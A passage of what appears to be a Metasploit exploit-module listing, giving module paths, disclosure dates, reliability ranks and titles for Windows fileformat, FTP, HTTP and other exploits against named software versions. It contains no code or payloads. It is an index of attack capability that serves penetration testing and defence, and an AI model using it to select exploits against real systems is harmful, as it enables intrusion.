   windows/fileformat/adobe_libtiff                                  2010-02-16       good       Adobe Acrobat Bundled LibTIFF Integer Overflow
   windows/fileformat/adobe_media_newplayer                          2009-12-14       good       Adobe Doc.media.newPlayer Use After Free Vulnerability
   windows/fileformat/adobe_pdf_embedded_exe                         2010-03-29       excellent  Adobe PDF Embedded EXE Social Engineering
   windows/fileformat/adobe_pdf_embedded_exe_nojs                    2010-03-29       excellent  Adobe PDF Escape EXE Social Engineering (No JavaScript)
   windows/fileformat/adobe_reader_u3d                               2011-12-06       average    Adobe Reader U3D Memory Corruption Vulnerability
   windows/fileformat/adobe_toolbutton                               2013-08-08       normal     Adobe Reader ToolButton Use After Free
   windows/fileformat/adobe_u3d_meshdecl                             2009-10-13       good       Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
   windows/fileformat/adobe_utilprintf                               2008-02-08       good       Adobe util.printf() Buffer Overflow
   windows/fileformat/allplayer_m3u_bof                              2013-10-09       normal     ALLPlayer M3U Buffer Overflow
   windows/fileformat/altap_salamander_pdb                           2007-06-19       good       Altap Salamander 2.5 PE Viewer Buffer Overflow
   windows/fileformat/aol_desktop_linktag                            2011-01-31       normal     AOL Desktop 9.6 RTX Buffer Overflow
   windows/fileformat/aol_phobos_bof                                 2010-01-20       average    AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow
   windows/fileformat/apple_quicktime_pnsize                         2011-08-08       good       Apple QuickTime PICT PnSize Buffer Overflow
   windows/fileformat/apple_quicktime_rdrf                           2013-05-22       normal     Apple Quicktime 7 Invalid Atom Length Buffer Overflow
   windows/fileformat/apple_quicktime_texml                          2012-05-15       normal     Apple QuickTime TeXML Style Element Stack Buffer Overflow
   windows/fileformat/audio_coder_m3u                                2013-05-01       normal     AudioCoder .M3U Buffer Overflow
   windows/fileformat/audio_wkstn_pls                                2009-12-08       good       Audio Workstation 6.4.2.4.3 pls Buffer Overflow
   windows/fileformat/audiotran_pls                                  2010-01-09       good       Audiotran 1.4.1 (PLS File) Stack Buffer Overflow
   windows/fileformat/audiotran_pls_1424                             2010-09-09       good       Audiotran PLS File Stack Buffer Overflow
   windows/fileformat/aviosoft_plf_buf                               2011-11-09       good       Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow
   windows/fileformat/bacnet_csv                                     2010-09-16       good       BACnet OPC Client Buffer Overflow
   windows/fileformat/beetel_netconfig_ini_bof                       2013-10-12       normal     Beetel Connection Manager NetConfig.ini Buffer Overflow
   windows/fileformat/blazedvd_hdtv_bof                              2012-04-03       normal     BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability
   windows/fileformat/blazedvd_plf                                   2009-08-03       good       BlazeDVD 6.1 PLF Buffer Overflow
   windows/fileformat/bpftp_client_bps_bof                           2014-07-24       normal     BulletProof FTP Client BPS Buffer Overflow
   windows/fileformat/bsplayer_m3u                                   2010-01-07       normal     BS.Player 2.57 Buffer Overflow (Unicode SEH)
   windows/fileformat/ca_cab                                         2007-06-05       good       CA Antivirus Engine CAB Buffer Overflow
   windows/fileformat/cain_abel_4918_rdp                             2008-11-30       good       Cain and Abel RDP Buffer Overflow
   windows/fileformat/ccmplayer_m3u_bof                              2011-11-30       good       CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow
   windows/fileformat/chasys_draw_ies_bmp_bof                        2013-07-26       normal     Chasys Draw IES Buffer Overflow
   windows/fileformat/coolpdf_image_stream_bof                       2013-01-18       normal     Cool PDF Image Stream Buffer Overflow
   windows/fileformat/corelpdf_fusion_bof                            2013-07-08       normal     Corel PDF Fusion Stack Buffer Overflow
   windows/fileformat/csound_getnum_bof                              2012-02-23       normal     Csound hetro File Handling Stack Buffer Overflow
   windows/fileformat/cutezip_bof                                    2011-02-12       normal     GlobalSCAPE CuteZIP Stack Buffer Overflow
   windows/fileformat/cve_2017_8464_lnk_rce                          2017-06-13       excellent  LNK Code Execution Vulnerability
   windows/fileformat/cyberlink_p2g_bof                              2011-09-12       great      CyberLink Power2Go name Attribute (p2g) Stack Buffer Overflow Exploit
   windows/fileformat/cytel_studio_cy3                               2011-10-02       good       Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow
   windows/fileformat/deepburner_path                                2006-12-19       great      AstonSoft DeepBurner (DBR File) Path Buffer Overflow
   windows/fileformat/destinymediaplayer16                           2009-01-03       good       Destiny Media Player 1.61 PLS M3U Buffer Overflow
   windows/fileformat/digital_music_pad_pls                          2010-09-17       normal     Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow
   windows/fileformat/djstudio_pls_bof                               2009-12-30       normal     DJ Studio Pro 5.1 .pls Stack Buffer Overflow
   windows/fileformat/djvu_imageurl                                  2008-10-30       low        DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow
   windows/fileformat/dvdx_plf_bof                                   2007-06-02       normal     DVD X Player 5.5 .plf PlayList Buffer Overflow
   windows/fileformat/easycdda_pls_bof                               2010-06-07       normal     Easy CD-DA Recorder PLS Buffer Overflow
   windows/fileformat/emc_appextender_keyworks                       2009-09-29       average    EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow
   windows/fileformat/erdas_er_viewer_bof                            2013-04-23       normal     ERS Viewer 2011 ERS File Handling Buffer Overflow
   windows/fileformat/erdas_er_viewer_rf_report_error                2013-05-23       normal     ERS Viewer 2013 ERS File Handling Buffer Overflow
   windows/fileformat/esignal_styletemplate_bof                      2011-09-06       normal     eSignal and eSignal Pro File Parsing Buffer Overflow in QUO
   windows/fileformat/etrust_pestscan                                2009-11-02       average    CA eTrust PestPatrol ActiveX Control Buffer Overflow
   windows/fileformat/ezip_wizard_bof                                2009-03-09       good       eZip Wizard 3.0 Stack Buffer Overflow
   windows/fileformat/fatplayer_wav                                  2010-10-18       normal     Fat Player Media Player 0.6b0 Buffer Overflow
   windows/fileformat/fdm_torrent                                    2009-02-02       good       Free Download Manager Torrent Parsing Buffer Overflow
   windows/fileformat/feeddemon_opml                                 2009-02-09       great      FeedDemon Stack Buffer Overflow
   windows/fileformat/foxit_reader_filewrite                         2011-03-05       normal     Foxit PDF Reader 4.2 Javascript File Write
   windows/fileformat/foxit_reader_launch                            2009-03-09       good       Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow
   windows/fileformat/foxit_title_bof                                2010-11-13       great      Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
   windows/fileformat/free_mp3_ripper_wav                            2011-08-27       great      Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow
   windows/fileformat/galan_fileformat_bof                           2009-12-07       normal     gAlan 0.2.1 Buffer Overflow
   windows/fileformat/gsm_sim                                        2010-07-07       normal     GSM SIM Editor 5.15 Buffer Overflow
   windows/fileformat/gta_samp                                       2011-09-18       normal     GTA SA-MP server.cfg Buffer Overflow
   windows/fileformat/hhw_hhp_compiledfile_bof                       2006-02-06       good       HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow
   windows/fileformat/hhw_hhp_contentfile_bof                        2006-02-06       good       HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow
   windows/fileformat/hhw_hhp_indexfile_bof                          2009-01-17       good       HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow
   windows/fileformat/homm3_h3m                                      2015-07-29       normal     Heroes of Might and Magic III .h3m Map file Buffer Overflow
   windows/fileformat/ht_mp3player_ht3_bof                           2009-06-29       good       HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow
   windows/fileformat/ibm_forms_viewer_fontname                      2013-12-05       normal     IBM Forms Viewer Unicode Buffer Overflow
   windows/fileformat/ibm_pcm_ws                                     2012-02-28       great      IBM Personal Communications iSeries Access WorkStation 5.9 Profile
   windows/fileformat/icofx_bof                                      2013-12-10       normal     IcoFX Stack Buffer Overflow
   windows/fileformat/ideal_migration_ipj                            2009-12-05       great      PointDev IDEAL Migration Buffer Overflow
   windows/fileformat/iftp_schedule_bof                              2014-11-06       normal     i-FTP Schedule Buffer Overflow
   windows/fileformat/irfanview_jpeg2000_bof                         2012-01-16       normal     Irfanview JPEG2000 jp2 Stack Buffer Overflow
   windows/fileformat/ispvm_xcf_ispxcf                               2012-05-16       normal     Lattice Semiconductor ispVM System XCF File Handling Overflow
   windows/fileformat/kingview_kingmess_kvl                          2012-11-20       normal     KingView Log File Parsing Buffer Overflow
   windows/fileformat/lattice_pac_bof                                2012-05-16       normal     Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow
   windows/fileformat/lotusnotes_lzh                                 2011-05-24       good       Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)
   windows/fileformat/magix_musikmaker_16_mmm                        2011-04-26       good       Magix Musik Maker 16 .mmm Stack Buffer Overflow
   windows/fileformat/mcafee_hercules_deletesnapshot                 2008-08-04       low        McAfee Remediation Client ActiveX Control Buffer Overflow
   windows/fileformat/mcafee_showreport_exec                         2012-01-12       normal     McAfee SaaS MyCioScan ShowReport Remote Command Execution
   windows/fileformat/mediacoder_m3u                                 2013-06-24       normal     MediaCoder .M3U Buffer Overflow
   windows/fileformat/mediajukebox                                   2009-07-01       normal     Media Jukebox 8.0.400 Buffer Overflow (SEH)
   windows/fileformat/microp_mppl                                    2010-08-23       great      MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow
   windows/fileformat/millenium_mp3_pls                              2009-07-30       great      Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow
   windows/fileformat/mini_stream_pls_bof                            2010-07-16       great      Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow
   windows/fileformat/mjm_coreplayer2011_s3m                         2011-04-30       good       MJM Core Player 2011 .s3m Stack Buffer Overflow
   windows/fileformat/mjm_quickplayer_s3m                            2011-04-30       good       MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow
   windows/fileformat/moxa_mediadbplayback                           2010-10-19       average    MOXA MediaDBPlayback ActiveX Control Buffer Overflow
   windows/fileformat/mplayer_m3u_bof                                2011-03-19       average    MPlayer Lite M3U Buffer Overflow
   windows/fileformat/mplayer_sami_bof                               2011-05-19       normal     MPlayer SAMI Subtitle File Buffer Overflow
   windows/fileformat/ms09_067_excel_featheader                      2009-11-10       good       MS09-067 Microsoft Excel Malformed FEATHEADER Record Vulnerability
   windows/fileformat/ms10_004_textbytesatom                         2010-02-09       good       MS10-004 Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow
   windows/fileformat/ms10_038_excel_obj_bof                         2010-06-08       normal     MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow
   windows/fileformat/ms10_087_rtf_pfragments_bof                    2010-11-09       great      MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
   windows/fileformat/ms11_006_createsizeddibsection                 2010-12-15       great      MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
   windows/fileformat/ms11_021_xlb_bof                               2011-08-09       normal     MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow
   windows/fileformat/ms12_005                                       2012-01-10       excellent  MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability
   windows/fileformat/ms12_027_mscomctl_bof                          2012-04-10       average    MS12-027 MSCOMCTL ActiveX Buffer Overflow
   windows/fileformat/ms13_071_theme                                 2013-09-10       excellent  MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution
   windows/fileformat/ms14_017_rtf                                   2014-04-01       normal     MS14-017 Microsoft Word RTF Object Confusion
   windows/fileformat/ms14_060_sandworm                              2014-10-14       excellent  MS14-060 Microsoft Windows OLE Package Manager Code Execution
   windows/fileformat/ms14_064_packager_python                       2014-11-12       excellent  MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python
   windows/fileformat/ms14_064_packager_run_as_admin                 2014-10-21       excellent  MS14-064 Microsoft Windows OLE Package Manager Code Execution
   windows/fileformat/ms15_020_shortcut_icon_dllloader               2015-03-10       excellent  Microsoft Windows Shell LNK Code Execution
   windows/fileformat/ms15_100_mcl_exe                               2015-09-08       excellent  MS15-100 Microsoft Windows Media Center MCL Vulnerability
   windows/fileformat/ms_visual_basic_vbp                            2007-09-04       good       Microsoft Visual Basic VBP Buffer Overflow
   windows/fileformat/mswin_tiff_overflow                            2013-11-05       average    MS13-096 Microsoft Tagged Image File Format (TIFF) Integer Overflow
   windows/fileformat/msworks_wkspictureinterface                    2008-11-28       low        Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution
   windows/fileformat/mymp3player_m3u                                2010-03-18       good       Steinberg MyMP3Player 3.0 Buffer Overflow
   windows/fileformat/netop                                          2011-04-28       normal     NetOp Remote Control Client 9.5 Buffer Overflow
   windows/fileformat/nitro_reader_jsapi                             2017-07-24       excellent  Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution
   windows/fileformat/nuance_pdf_launch_overflow                     2010-10-08       great      Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
   windows/fileformat/office_ole_multiple_dll_hijack                 2015-12-08       normal     Office OLE Multiple DLL Side Loading Vulnerabilities
   windows/fileformat/office_word_hta                                2017-04-14       excellent  Microsoft Office Word Malicious Hta Execution
   windows/fileformat/openoffice_ole                                 2008-04-17       normal     OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow
   windows/fileformat/orbit_download_failed_bof                      2008-04-03       normal     Orbit Downloader URL Unicode Conversion Overflow
   windows/fileformat/orbital_viewer_orb                             2010-02-27       great      Orbital Viewer ORB File Parsing Buffer Overflow
   windows/fileformat/ovf_format_string                              2012-11-08       normal     VMWare OVF Tools Format String Vulnerability
   windows/fileformat/proshow_cellimage_bof                          2009-08-20       great      ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow
   windows/fileformat/proshow_load_bof                               2012-06-06       normal     Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow
   windows/fileformat/publishit_pui                                  2014-02-05       normal     Publish-It PUI Buffer Overflow (SEH)
   windows/fileformat/real_networks_netzip_bof                       2011-01-30       good       Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability
   windows/fileformat/real_player_url_property_bof                   2012-12-14       normal     RealPlayer RealMedia File Handling Buffer Overflow
   windows/fileformat/realplayer_ver_attribute_bof                   2013-12-20       normal     RealNetworks RealPlayer Version Attribute Buffer Overflow
   windows/fileformat/safenet_softremote_groupname                   2009-10-30       good       SafeNet SoftRemote GROUPNAME Buffer Overflow
   windows/fileformat/sascam_get                                     2008-12-29       low        SasCam Webcam Server v.2.6.5 Get() Method Buffer Overflow
   windows/fileformat/scadaphone_zip                                 2011-09-12       good       ScadaTEC ScadaPhone Stack Buffer Overflow
   windows/fileformat/shadow_stream_recorder_bof                     2010-03-29       normal     Shadow Stream Recorder 3.0.1.7 Buffer Overflow
   windows/fileformat/shaper_pdf_bof                                 2015-10-03       normal     PDF Shaper Buffer Overflow
   windows/fileformat/somplplayer_m3u                                2010-01-22       great      S.O.M.P.L 1.0 Player Buffer Overflow
   windows/fileformat/subtitle_processor_m3u_bof                     2011-04-26       normal     Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow
   windows/fileformat/tfm_mmplayer_m3u_ppl_bof                       2012-03-23       good       TFM MMPlayer (m3u/ppl File) Buffer Overflow
   windows/fileformat/total_video_player_ini_bof                     2013-11-24       normal     Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow
   windows/fileformat/tugzip                                         2008-10-28       good       TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability
   windows/fileformat/ultraiso_ccd                                   2009-04-03       great      UltraISO CCD File Parsing Buffer Overflow
   windows/fileformat/ultraiso_cue                                   2007-05-24       great      UltraISO CUE File Parsing Buffer Overflow
   windows/fileformat/ursoft_w32dasm                                 2005-01-24       good       URSoft W32Dasm Disassembler Function Buffer Overflow
   windows/fileformat/varicad_dwb                                    2010-03-17       great      VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow
   windows/fileformat/videocharge_studio                             2013-10-27       normal     VideoCharge Studio Buffer Overflow (SEH)
   windows/fileformat/videolan_tivo                                  2008-10-22       good       VideoLAN VLC TiVo Buffer Overflow
   windows/fileformat/videospirit_visprj                             2011-04-11       good       VeryTools Video Spirit Pro
   windows/fileformat/visio_dxf_bof                                  2010-05-04       good       Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability
   windows/fileformat/visiwave_vwr_type                              2011-05-20       great      VisiWave VWR File Parsing Vulnerability
   windows/fileformat/vlc_modplug_s3m                                2011-04-07       average    VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow
   windows/fileformat/vlc_realtext                                   2008-11-05       good       VLC Media Player RealText Subtitle Overflow
   windows/fileformat/vlc_smb_uri                                    2009-06-24       great      VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow
   windows/fileformat/vlc_webm                                       2011-01-31       good       VideoLAN VLC MKV Memory Corruption
   windows/fileformat/vuplayer_cue                                   2009-08-18       good       VUPlayer CUE Buffer Overflow
   windows/fileformat/vuplayer_m3u                                   2009-08-18       good       VUPlayer M3U Buffer Overflow
   windows/fileformat/watermark_master                               2013-11-01       normal     Watermark Master Buffer Overflow (SEH)
   windows/fileformat/winamp_maki_bof                                2009-05-20       normal     Winamp MAKI Buffer Overflow
   windows/fileformat/winrar_name_spoofing                           2009-09-28       excellent  WinRAR Filename Spoofing
   windows/fileformat/wireshark_mpeg_overflow                        2014-03-20       good       Wireshark wiretap/mpeg.c Stack Buffer Overflow
   windows/fileformat/wireshark_packet_dect                          2011-04-18       good       Wireshark packet-dect.c Stack Buffer Overflow (local)
   windows/fileformat/wm_downloader_m3u                              2010-07-28       normal     WM Downloader 3.1.2.2 Buffer Overflow
   windows/fileformat/xenorate_xpl_bof                               2009-08-19       great      Xenorate 2.50 (.xpl) Universal Local Buffer Overflow (SEH)
   windows/fileformat/xion_m3u_sehbof                                2010-11-23       great      Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow
   windows/fileformat/xradio_xrl_sehbof                              2011-02-08       normal     xRadio 0.95b Buffer Overflow
   windows/fileformat/zinfaudioplayer221_pls                         2004-09-24       good       Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow
   windows/firewall/blackice_pam_icq                                 2004-03-18       great      ISS PAM.dll ICQ Parser Buffer Overflow
   windows/firewall/kerio_auth                                       2003-04-28       average    Kerio Firewall 2.1.4 Authentication Packet Overflow
   windows/ftp/32bitftp_list_reply                                   2010-10-12       good       32bit FTP Client Stack Buffer Overflow
   windows/ftp/3cdaemon_ftp_user                                     2005-01-04       average    3Com 3CDaemon 2.0 FTP Username Overflow
   windows/ftp/aasync_list_reply                                     2010-10-12       good       AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST)
   windows/ftp/ability_server_stor                                   2004-10-22       normal     Ability Server 2.34 STOR Command Stack Buffer Overflow
   windows/ftp/absolute_ftp_list_bof                                 2011-11-09       normal     AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow
   windows/ftp/bison_ftp_bof                                         2011-08-07       normal     BisonWare BisonFTP Server Buffer Overflow
   windows/ftp/cesarftp_mkd                                          2006-06-12       average    Cesar FTP 0.99g MKD Command Buffer Overflow
   windows/ftp/comsnd_ftpd_fmtstr                                    2012-06-08       good       ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability
   windows/ftp/dreamftp_format                                       2004-03-03       good       BolinTech Dream FTP Server 1.02 Format String
   windows/ftp/easyfilesharing_pass                                  2006-07-31       average    Easy File Sharing FTP Server 2.0 PASS Overflow
   windows/ftp/easyftp_cwd_fixret                                    2010-02-16       great      EasyFTP Server CWD Command Stack Buffer Overflow
   windows/ftp/easyftp_list_fixret                                   2010-07-05       great      EasyFTP Server LIST Command Stack Buffer Overflow
   windows/ftp/easyftp_mkd_fixret                                    2010-04-04       great      EasyFTP Server MKD Command Stack Buffer Overflow
   windows/ftp/filecopa_list_overflow                                2006-07-19       average    FileCopa FTP Server Pre 18 Jul Version
   windows/ftp/filewrangler_list_reply                               2010-10-12       good       FileWrangler 5.30 Stack Buffer Overflow
   windows/ftp/freefloatftp_user                                     2012-06-12       normal     Free Float FTP Server USER Command Buffer Overflow
   windows/ftp/freefloatftp_wbem                                     2012-12-07       excellent  FreeFloat FTP Server Arbitrary File Upload
   windows/ftp/freeftpd_pass                                         2013-08-20       normal     freeFTPd PASS Command Buffer Overflow
   windows/ftp/freeftpd_user                                         2005-11-16       average    freeFTPd 1.0 Username Overflow
   windows/ftp/ftpgetter_pwd_reply                                   2010-10-12       good       FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)
   windows/ftp/ftppad_list_reply                                     2010-10-12       good       FTPPad 1.2.0 Stack Buffer Overflow
   windows/ftp/ftpshell51_pwd_reply                                  2010-10-12       good       FTPShell 5.1 Stack Buffer Overflow
   windows/ftp/ftpsynch_list_reply                                   2010-10-12       good       FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow
   windows/ftp/gekkomgr_list_reply                                   2010-10-12       good       Gekko Manager FTP Client Stack Buffer Overflow
   windows/ftp/globalscapeftp_input                                  2005-05-01       great      GlobalSCAPE Secure FTP Server Input Overflow
   windows/ftp/goldenftp_pass_bof                                    2011-01-23       average    GoldenFTP PASS Stack Buffer Overflow
   windows/ftp/httpdx_tolog_format                                   2009-11-17       great      HTTPDX tolog() Function Format String Vulnerability
   windows/ftp/kmftp_utility_cwd                                     2015-08-23       normal     Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow
   windows/ftp/leapftp_list_reply                                    2010-10-12       good       LeapFTP 3.0.1 Stack Buffer Overflow
   windows/ftp/leapftp_pasv_reply                                    2003-06-09       normal     LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow
   windows/ftp/ms09_053_ftpd_nlst                                    2009-08-31       great      MS09-053 Microsoft IIS FTP Server NLST Response Overflow
   windows/ftp/netterm_netftpd_user                                  2005-04-26       great      NetTerm NetFTPD USER Buffer Overflow
   windows/ftp/odin_list_reply                                       2010-10-12       good       Odin Secure FTP 4.1 Stack Buffer Overflow (LIST)
   windows/ftp/open_ftpd_wbem                                        2012-06-18       excellent  Open-FTPD 1.2 Arbitrary File Upload
   windows/ftp/oracle9i_xdb_ftp_pass                                 2003-08-18       great      Oracle 9i XDB FTP PASS Overflow (win32)
   windows/ftp/oracle9i_xdb_ftp_unlock                               2003-08-18       great      Oracle 9i XDB FTP UNLOCK Overflow (win32)
   windows/ftp/pcman_put                                             2015-08-07       normal     PCMAN FTP Server Buffer Overflow - PUT Command
   windows/ftp/pcman_stor                                            2013-06-27       normal     PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow
   windows/ftp/proftp_banner                                         2009-08-25       normal     ProFTP 2.9 Banner Remote Buffer Overflow
   windows/ftp/quickshare_traversal_write                            2011-02-03       excellent  QuickShare File Server 1.2.1 Directory Traversal Vulnerability
   windows/ftp/ricoh_dl_bof                                          2012-03-01       normal     Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow
   windows/ftp/sami_ftpd_list                                        2013-02-27       low        Sami FTP Server LIST Command Buffer Overflow
   windows/ftp/sami_ftpd_user                                        2006-01-24       normal     KarjaSoft Sami FTP Server v2.02 USER Overflow
   windows/ftp/sasser_ftpd_port                                      2004-05-10       average    Sasser Worm avserve FTP PORT Buffer Overflow
   windows/ftp/scriptftp_list                                        2011-10-12       good       ScriptFTP LIST Remote Buffer Overflow
   windows/ftp/seagull_list_reply                                    2010-10-12       good       Seagull FTP v3.3 Build 409 Stack Buffer Overflow
   windows/ftp/servu_chmod                                           2004-12-31       normal     Serv-U FTP Server Buffer Overflow
   windows/ftp/servu_mdtm                                            2004-02-26       good       Serv-U FTPD MDTM Overflow
   windows/ftp/slimftpd_list_concat                                  2005-07-21       great      SlimFTPd LIST Concatenation Overflow
   windows/ftp/trellian_client_pasv                                  2010-04-11       normal     Trellian FTP Client 3.01 PASV Remote Buffer Overflow
   windows/ftp/turboftp_port                                         2012-10-03       great      Turbo FTP Server 1.30.823 PORT Overflow
   windows/ftp/vermillion_ftpd_port                                  2009-09-23       great      Vermillion FTP Daemon PORT Command Memory Corruption
   windows/ftp/warftpd_165_pass                                      1998-03-19       average    War-FTPD 1.65 Password Overflow
   windows/ftp/warftpd_165_user                                      1998-03-19       average    War-FTPD 1.65 Username Overflow
   windows/ftp/wftpd_size                                            2006-08-23       average    Texas Imperial Software WFTPD 3.23 SIZE Overflow
   windows/ftp/winaxe_server_ready                                   2016-11-03       good       WinaXe 7.7 FTP Client Remote Buffer Overflow
   windows/ftp/wing_ftp_admin_exec                                   2014-06-19       excellent  Wing FTP Server Authenticated Command Execution
   windows/ftp/wsftp_server_503_mkd                                  2004-11-29       great      WS-FTP Server 5.03 MKD Overflow
   windows/ftp/wsftp_server_505_xmd5                                 2006-09-14       average    Ipswitch WS_FTP Server 5.05 XMD5 Overflow
   windows/ftp/xftp_client_pwd                                       2010-04-22       normal     Xftp FTP Client 3.0 PWD Remote Buffer Overflow
   windows/ftp/xlink_client                                          2009-10-03       normal     Xlink FTP Client Buffer Overflow
   windows/ftp/xlink_server                                          2009-10-03       good       Xlink FTP Server Buffer Overflow
   windows/games/mohaa_getinfo                                       2004-07-17       great      Medal of Honor Allied Assault getinfo Stack Buffer Overflow
   windows/games/racer_503beta5                                      2008-08-10       great      Racer v0.5.3 Beta 5 Buffer Overflow
   windows/games/ut2004_secure                                       2004-06-18       good       Unreal Tournament 2004 "secure" Overflow (Win32)
   windows/http/adobe_robohelper_authbypass                          2009-09-23       excellent  Adobe RoboHelp Server 8 Arbitrary File Upload and Execute
   windows/http/altn_securitygateway                                 2008-06-02       average    Alt-N SecurityGateway username Buffer Overflow
   windows/http/altn_webadmin                                        2003-06-24       average    Alt-N WebAdmin USER Buffer Overflow
   windows/http/amlibweb_webquerydll_app                             2010-08-03       normal     Amlibweb NetOpacs webquery.dll Stack Buffer Overflow
   windows/http/apache_chunked                                       2002-06-19       good       Apache Win32 Chunked Encoding
   windows/http/apache_mod_rewrite_ldap                              2006-07-28       great      Apache Module mod_rewrite LDAP Protocol Buffer Overflow
   windows/http/apache_modjk_overflow                                2007-03-02       great      Apache mod_jk 1.2.20 Buffer Overflow
   windows/http/avaya_ccr_imageupload_exec                           2012-06-28       excellent  Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution
   windows/http/badblue_ext_overflow                                 2003-04-20       great      BadBlue 2.5 EXT.dll Buffer Overflow
   windows/http/badblue_passthru                                     2007-12-10       great      BadBlue 2.72b PassThru Buffer Overflow
   windows/http/bea_weblogic_jsessionid                              2009-01-13       good       BEA WebLogic JSESSIONID Cookie Value Overflow
   windows/http/bea_weblogic_post_bof                                2008-07-17       great      Oracle Weblogic Apache Connector POST Request Buffer Overflow
   windows/http/bea_weblogic_transfer_encoding                       2008-09-09       great      BEA Weblogic Transfer-Encoding Buffer Overflow
   windows/http/belkin_bulldog                                       2009-03-08       average    Belkin Bulldog Plus Web Service Buffer Overflow
   windows/http/ca_arcserve_rpc_authbypass                           2011-07-25       excellent  CA Arcserve D2D GWT RPC Credential Information Disclosure
   windows/http/ca_igateway_debug                                    2005-10-06       average    CA iTechnology iGateway Debug Mode Buffer Overflow
   windows/http/ca_totaldefense_regeneratereports                    2011-04-13       excellent  CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection
   windows/http/cogent_datahub_command                               2014-04-29       manual     Cogent DataHub Command Injection
   windows/http/cogent_datahub_request_headers_bof                   2013-07-26       normal     Cogent DataHub HTTP Server Buffer Overflow
   windows/http/coldfusion_fckeditor                                 2009-07-03       excellent  ColdFusion 8.0.1 Arbitrary File Upload and Execute
   windows/http/cyclope_ess_sqli                                     2012-08-08       excellent  Cyclope Employee Surveillance Solution v6 SQL Injection
   windows/http/desktopcentral_file_upload                           2013-11-11       excellent  ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload
   windows/http/desktopcentral_statusupdate_upload                   2014-08-31       excellent  ManageEngine Desktop Central StatusUpdate Arbitrary File Upload
   windows/http/disk_pulse_enterprise_bof                            2016-10-03       excellent  Disk Pulse Enterprise Login Buffer Overflow
   windows/http/disk_pulse_enterprise_get                            2017-08-25       excellent  Disk Pulse Enterprise GET Buffer Overflow
   windows/http/diskboss_get_bof                                     2016-12-05       excellent  DiskBoss Enterprise GET Buffer Overflow
   windows/http/disksavvy_get_bof                                    2016-12-01       excellent  DiskSavvy Enterprise GET Buffer Overflow
   windows/http/disksorter_bof                                       2017-03-15       great      Disk Sorter Enterprise GET Buffer Overflow
   windows/http/dupscts_bof                                          2017-03-15       great      Dup Scout Enterprise GET Buffer Overflow
   windows/http/easychatserver_seh                                   2017-10-09       normal     Easy Chat Server User Registeration Buffer Overflow (SEH)
   windows/http/easyfilesharing_post                                 2017-06-12       normal     Easy File Sharing HTTP Server 7.2 POST Buffer Overflow
   windows/http/easyfilesharing_seh                                  2015-12-02       normal     Easy File Sharing HTTP Server 7.2 SEH Overflow
   windows/http/easyftp_list                                         2010-02-18       great      EasyFTP Server list.html path Stack Buffer Overflow
   windows/http/edirectory_host                                      2006-10-21       great      Novell eDirectory NDS Server Host Header Overflow
   windows/http/edirectory_imonitor                                  2005-08-11       great      eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow
   windows/http/efs_easychatserver_username                          2007-08-14       great      EFS Easy Chat Server Authentication Request Handling Buffer Overflow
   windows/http/efs_fmws_userid_bof                                  2014-05-20       normal     Easy File Management Web Server Stack Buffer Overflow
   windows/http/ektron_xslt_exec                                     2012-10-16       excellent  Ektron 8.02 XSLT Transform Remote Code Execution
